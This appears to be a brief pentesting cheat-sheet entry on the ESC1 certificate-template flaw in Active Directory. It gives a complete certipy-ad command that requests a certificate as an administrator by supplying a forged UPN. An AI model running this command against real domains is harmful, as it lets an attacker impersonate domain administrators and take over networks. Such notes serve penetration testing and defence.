ESC1
ESC1
If a template is vulnerable to ESC1, certipy can automatically exploit it. Request the Administrators certificate:
certipy-ad req -u <user> -p <password> -dc-ip <IP> -template <Template Name> -upn [email protected] -ca <Certificate Authorities> -target dc.domain.local